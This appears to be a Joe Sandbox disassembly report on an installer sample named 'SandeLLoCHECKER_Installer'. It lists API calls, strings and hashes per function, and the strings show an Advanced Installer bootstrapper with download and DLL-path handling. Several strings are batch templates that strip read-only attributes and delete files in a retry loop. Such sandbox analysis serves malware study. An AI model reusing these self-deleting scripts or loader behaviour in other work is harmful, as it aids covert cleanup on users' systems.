• Opcode ID: 3bf8286a03d214d457d0f33b939026baa39940147af94f66505ca875e4876fd4
• Instruction ID: d06907b79a5979de670c73240e446ad03e77e5a8575db5e92b6459c605f911a2
• Opcode Fuzzy Hash: 3bf8286a03d214d457d0f33b939026baa39940147af94f66505ca875e4876fd4
• Instruction Fuzzy Hash: 56118B71604705EBD7208F59D805B5ABBF8FB45B20F204A5EE8259B6C0D7BA6904CB91
Similarity
• API ID: Init_thread_footer$CreateHeapInstanceProcess
• String ID:
• API String ID: 3807588171-0
• Opcode ID: 2216afe483a9f6fc6eb2c86e8ed06ab4aa8e448fade62e28007a7e3a3f5408d2
• Instruction ID: 1cc06f728dd4d9ed44128e54b98791a189a1f3fc7a5568aecb7f307d6bf08ad6
• Opcode Fuzzy Hash: 2216afe483a9f6fc6eb2c86e8ed06ab4aa8e448fade62e28007a7e3a3f5408d2
• Instruction Fuzzy Hash: 656134B0504B48CFE710CF28C50879ABBF0FF55318F148A5CD58A9B782D7B9A609CB91
APIs
• SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?,SystemFolder,0000000C,?,?,?), ref: 00975BB3
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00975CAE
• GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsFolder,0000000D,?,?,?), ref: 00975DA6
• GetWindowsDirectoryW.KERNEL32(?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00975E85
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,WindowsVolume,0000000D,?,?,?), ref: 00975FC1
• SHGetSpecialFolderLocation.SHELL32(00000000,?,WindowsVolume,0000000D,?,?,?), ref: 009760A2
• __Init_thread_footer.LIBCMT ref: 00976116
• LoadLibraryW.KERNEL32(shfolder.dll,?,?,?), ref: 0097612C
• GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0097615E
• SHGetPathFromIDListW.SHELL32(?,?), ref: 00976213
• SHGetMalloc.SHELL32(00000000), ref: 0097622C
  • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Directory$FolderPathWindows$AddressAllocateFileFromHeapInit_thread_footerLibraryListLoadLocationMallocModuleNameProcSpecialSystem
                                                                                                                        • String ID: ProgramFiles64Folder$ProgramW6432$SETUPEXEDIR$SHGetFolderPathW$System32Folder$SystemFolder$TempFolder$WindowsFolder$WindowsVolume$shfolder.dll
                                                                                                                        • API String ID: 2816963309-2142986682
                                                                                                                        • Opcode ID: 999f91d569947202d129c8e51b1a6c1b9ddf204d175ffe209b939b8f9873523e
                                                                                                                        • Instruction ID: 472c3dbfa7645c6c9eb5802823d8bf32ac6ef9382beafcf2bdfbd2c58d7b50f9
                                                                                                                        • Opcode Fuzzy Hash: 999f91d569947202d129c8e51b1a6c1b9ddf204d175ffe209b939b8f9873523e
                                                                                                                        • Instruction Fuzzy Hash: E9321672600A059BDB68DF28CC55BBAB3B9FF50300F1582ACD51ADB292EF719E41CB51
                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00947A6A
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,?), ref: 00947AAC
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00947AF4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00947B4C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947B5C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00947BA4
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947B04
                                                                                                                          • Part of subcall function 00A16258: EnterCriticalSection.KERNEL32(00B2FE4C,?,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16262
                                                                                                                          • Part of subcall function 00A16258: LeaveCriticalSection.KERNEL32(00B2FE4C,?,0084ACF7,00B30A7C,00A9D9D0), ref: 00A16295
                                                                                                                          • Part of subcall function 00A16258: RtlWakeAllConditionVariable.NTDLL ref: 00A1630C
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00947BB4
                                                                                                                          • Part of subcall function 0091D900: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 0091D941
                                                                                                                        Strings
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00947967, 0094796F
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00947987
                                                                                                                        • SetSearchPathMode, xrefs: 00947AEE
                                                                                                                        • SetDefaultDllDirectories, xrefs: 00947B9E
                                                                                                                        • kernel32, xrefs: 00947AA7
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00947980, 0094798F
                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00947962
                                                                                                                        • kernel32.dll, xrefs: 00947CAF
                                                                                                                        • SetDllDirectory, xrefs: 00947B46
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$AddressProc$CriticalSection$ConditionDirectoryEnterFileHandleHeapLeaveModuleMoveProcessSystemVariableWake
                                                                                                                        • String ID: @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$@echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r "$SetDefaultDllDirectories$SetDllDirectory$SetSearchPathMode$kernel32$kernel32.dll
                                                                                                                        • API String ID: 3437638698-3455668873
                                                                                                                        • Opcode ID: 21b41434167619abe3e8a3a1f92e0e08d02725a9b2698c3cb491744200d18f19
                                                                                                                        • Instruction ID: 28dec3916109d6a89fa6dd1b052ae8c0bca33921a6098ab9374dadcb7c9fd6fd
                                                                                                                        • Opcode Fuzzy Hash: 21b41434167619abe3e8a3a1f92e0e08d02725a9b2698c3cb491744200d18f19
                                                                                                                        • Instruction Fuzzy Hash: 0EE13EB0901249EFDB20DF68CC49FDEBBB4FF45318F558259E8189B292D7719A08CB51
                                                                                                                        APIs
                                                                                                                        • GetActiveWindow.USER32 ref: 0097BEB0
                                                                                                                        • SetLastError.KERNEL32(0000000E), ref: 0097BECD
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0097BEE5
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0097BF02
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 0097BF25
                                                                                                                        • DialogBoxParamW.USER32(000007D0,00000000,008BA230,00000000), ref: 0097BF42
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0097C0F4
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0097C128
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 0097C2FD
                                                                                                                        • SetEvent.KERNEL32(?,?,00000000,?,?), ref: 0097C36F
                                                                                                                          • Part of subcall function 009891C0: DeleteFileW.KERNEL32(?,?,00000000,?,C7BA013E,80004005,?,00000000,?,?,C7BA013E,?,00000000), ref: 009891EB
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$CriticalEventInit_thread_footerSection$ActiveCurrentDeleteDialogEnterErrorFileHeapLastLeaveParamProcessThreadWindow
                                                                                                                        • String ID: v$Advinst_Extract_$Code returned to Windows by setup:$FILES.7z
                                                                                                                        • API String ID: 2923632737-2516696193
                                                                                                                        • Opcode ID: e57075c808f253089d2c2a2073fd22259485bee6913390efca30d0126cd0cbe1
                                                                                                                        • Instruction ID: abee14147be664230b2c1b779bbd220da4280207acc787f0d04125ebb7000261
                                                                                                                        • Opcode Fuzzy Hash: e57075c808f253089d2c2a2073fd22259485bee6913390efca30d0126cd0cbe1
                                                                                                                        • Instruction Fuzzy Hash: C992C171900249DFDB14DBA8CC49BDEBBB8FF45314F1482A9E409AB292DB749E44CF91
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,?), ref: 0097C0F4
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0097C128
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharInit_thread_footerMultiWide$FindHeapProcessResource
                                                                                                                        • String ID: %hu$A valid language was received from commnad line. This is:$AI_BOOTSTRAPPERLANGS$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$Languages of setup:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\
                                                                                                                        • API String ID: 1419962739-297406034
                                                                                                                        • Opcode ID: 0fa5a46db5e8ea573baac4ccf707f754f5f5db78c15cbf0d0024275617cd59a9
                                                                                                                        • Instruction ID: a87792438135438e3194eaa42f0efd1e0281d7dad50d912c6e5345b9f4c8e779
                                                                                                                        • Opcode Fuzzy Hash: 0fa5a46db5e8ea573baac4ccf707f754f5f5db78c15cbf0d0024275617cd59a9
                                                                                                                        • Instruction Fuzzy Hash: AC52D471A006099FDB14DB68CC55BEEB7B9FF45314F14816CE819EB292EB349E04CB91
                                                                                                                        Control-flow Graph (graph image not reproduced)
                                                                                                                        APIs
                                                                                                                        • GetActiveWindow.USER32 ref: 0098AB5A
                                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?), ref: 0098AB97
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0098AC22
                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 0098ACAC
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0098ACB6
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0098ACC2
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0098AD2F
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0098AD37
                                                                                                                          • Part of subcall function 009822E0: GetDlgItem.USER32(?,00000002), ref: 00982300
                                                                                                                          • Part of subcall function 009822E0: GetWindowRect.USER32(00000000,?), ref: 00982316
                                                                                                                          • Part of subcall function 009822E0: ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,0098AB7A,?,?,?,?,?,?), ref: 0098232F
                                                                                                                          • Part of subcall function 009822E0: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0098AB7A,?,?), ref: 0098233A
                                                                                                                          • Part of subcall function 009822E0: GetDlgItem.USER32(00000000,000003E9), ref: 0098234C
                                                                                                                          • Part of subcall function 009822E0: GetWindowRect.USER32(00000000,?), ref: 00982362
                                                                                                                          • Part of subcall function 009822E0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,?,?,?,0098AB7A), ref: 009823A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$RectText$ActiveCurrentErrorInvalidateLastShowThread
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 127311041-3261393531
                                                                                                                        • Opcode ID: 70a37ea31eeac06dbc327b2d056c3dadbc4757cc8e8f3f1419af617a97f46b16
                                                                                                                        • Instruction ID: 2931796662f5b478d69264f5d22bd7ca9e4b2e72bdde2d479e5148469d15d400
                                                                                                                        • Opcode Fuzzy Hash: 70a37ea31eeac06dbc327b2d056c3dadbc4757cc8e8f3f1419af617a97f46b16
                                                                                                                        • Instruction Fuzzy Hash: 0361B331500604EFDB21EF68CD48B5ABBB5FF04320F14866AE8659B3E1DB75A905CF92

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00998500: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF), ref: 0099850D
                                                                                                                          • Part of subcall function 00998500: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,009964DA,?,C7BA013E,?,?,?,?,00A89C55,000000FF,?), ref: 0099852E
                                                                                                                          • Part of subcall function 00998500: InternetOpenW.WININET(AdvancedInstaller,00000003,00000000,00000000,10000000), ref: 0099857B
                                                                                                                          • Part of subcall function 00998500: GetLastError.KERNEL32(?,C7BA013E,?,?,?,?,00A89C55,000000FF,?,00995E0D,?,?,00000000,?,?), ref: 0099858E
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • ResetEvent.KERNEL32(?,00000000,00A89A25), ref: 009965AA
                                                                                                                        • InternetCloseHandle.WININET(00000001), ref: 009965B1
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009965C9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 009965D0
                                                                                                                        • InternetSetStatusCallbackW.WININET(?,00000000), ref: 009965F1
                                                                                                                        • InternetCloseHandle.WININET(?), ref: 009965FA
                                                                                                                        • InternetSetStatusCallbackW.WININET(00000000,00000000), ref: 0099663D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00996640
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseEventHandle$CallbackCreateInit_thread_footerObjectSingleStatusWait$ErrorFindHeapLastOpenProcessResetResource
                                                                                                                        • String ID: GET$attachment$filename
                                                                                                                        • API String ID: 789550500-3911147371
                                                                                                                        • Opcode ID: 80a2c248155f266c3cbc411c98730e32ce25b5c3a25fc09ea515be336757396d
                                                                                                                        • Instruction ID: 184317f80ff21a3030cf86fd87212f45d99054c6157311fe5289514f2707bd78
                                                                                                                        • Opcode Fuzzy Hash: 80a2c248155f266c3cbc411c98730e32ce25b5c3a25fc09ea515be336757396d
                                                                                                                        • Instruction Fuzzy Hash: 37127A70901249DFDF10DFACC948BAEBBF8FF15314F148169E815AB291EB759A04CBA1

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 0099605A
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        • ResetEvent.KERNEL32(00000000,C7BA013E,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 009960EF
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 009960FD
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 0099610F
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00A89AFD,000000FF,?,80004005), ref: 0099611A
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00996135
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleHeapInit_thread_footerInternetObjectSingleWait$AllocateDeleteEventFileFindProcessResetResource
                                                                                                                        • String ID: TEST$tin9999.tmp
                                                                                                                        • API String ID: 2171520157-3424081289
                                                                                                                        • Opcode ID: a779d1e4675b0b9f8132cc857b094c99d5e9a17eded58ceeec3508ef8d89c79a
                                                                                                                        • Instruction ID: b5c2956fb83d649b3c33a7c3a33de7f14b7ea88e2484af0ec8eb6b76fa7ec095
                                                                                                                        • Opcode Fuzzy Hash: a779d1e4675b0b9f8132cc857b094c99d5e9a17eded58ceeec3508ef8d89c79a
                                                                                                                        • Instruction Fuzzy Hash: 3CC1D171900649DFDF14DB68CD48BAEB7B8FF04324F148269E816AB291DB749E04CB91

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • DecodePointer.KERNEL32(?,00000000,?,00A15A74,00B2FDFC,?,00000000,?,0098ABAC,?,00000000,00000000,?,?), ref: 00A156E7
                                                                                                                        • LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,00000000,?,00A15A74,00B2FDFC,?,00000000,?,0098ABAC,?,00000000,00000000), ref: 00A156FC
                                                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A15778
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                         • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                         • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer$LibraryLoad
                                                                                                                        • String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
                                                                                                                        • API String ID: 1423960858-1745123996
                                                                                                                        • Opcode ID: e449b32ec8d543036db7ab5e4fb51d24b24d24af8205ea9637d4965f962bc798
                                                                                                                        • Instruction ID: 2ffe1d359ea98e6afb99db25be1cfd0d67148311c5dd1194c0bbaf1fad44c5fc
                                                                                                                        • Opcode Fuzzy Hash: e449b32ec8d543036db7ab5e4fb51d24b24d24af8205ea9637d4965f962bc798
                                                                                                                        • Instruction Fuzzy Hash: CD01D631A40721FFCA16AB70AD43FD937A49F42749F140974FC45B72E2EBA19A89C1C5

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00965B10: __Init_thread_footer.LIBCMT ref: 00965BE2
                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,C7BA013E,00000000,00000000,?), ref: 0096AADB
                                                                                                                        • GetTempFileNameW.KERNEL32(00000000,shim_clone,00000000,?,?,?,00000000,00000000), ref: 0096AC6D
                                                                                                                        • Wow64DisableWow64FsRedirection.KERNEL32(?,?,?,?,00000000,00000000), ref: 0096AD07
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000000,00000000), ref: 0096AD29
                                                                                                                        • Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 0096AD55
                                                                                                                        • DeleteFileW.KERNEL32(?,C7BA013E,00000000,00000000,00A3DEE0,000000FF,?,80070057,80004005,?), ref: 0096AE0D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Wow64$File$Redirection$CopyDeleteDisableFolderInit_thread_footerNamePathRevertTemp
